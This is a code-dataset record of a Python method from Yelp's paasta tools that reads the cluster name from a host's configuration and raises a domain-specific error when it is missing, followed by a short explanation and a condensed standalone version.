Get the cluster defined in this host's cluster config file. :returns: The name of the cluster defined in the paasta configuration
Get the cluster defined in this host's cluster config file.
[ "Get", "the", "cluster", "defined", "in", "this", "host", "s", "cluster", "config", "file", "." ]
def get_cluster(self) -> str: """Get the cluster defined in this host's cluster config file. :returns: The name of the cluster defined in the paasta configuration """ try: return self.config_dict["cluster"] except KeyError: raise PaastaNotConfiguredError( "Could not find cluster in configuration directory: %s" % self.directory )
[ "def", "get_cluster", "(", "self", ")", "->", "str", ":", "try", ":", "return", "self", ".", "config_dict", "[", "\"cluster\"", "]", "except", "KeyError", ":", "raise", "PaastaNotConfiguredError", "(", "\"Could not find cluster in configuration directory: %s\"", "%", "self", ".", "directory", ")" ]
https://github.com/Yelp/paasta/blob/6c08c04a577359509575c794b973ea84d72accf9/paasta_tools/utils.py#L2088-L2098
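The pattern here is translating a bare `KeyError` into a domain error that tells the operator where to look; a condensed, self-contained version:

    class PaastaNotConfiguredError(Exception):
        pass

    def get_cluster(config_dict, directory):
        # surface the missing key as a domain-specific error that points
        # at the configuration location, as SystemPaastaConfig does
        try:
            return config_dict["cluster"]
        except KeyError:
            raise PaastaNotConfiguredError(
                "Could not find cluster in configuration directory: %s" % directory
            )

    print(get_cluster({"cluster": "pnw-prod"}, "/etc/paasta"))  # pnw-prod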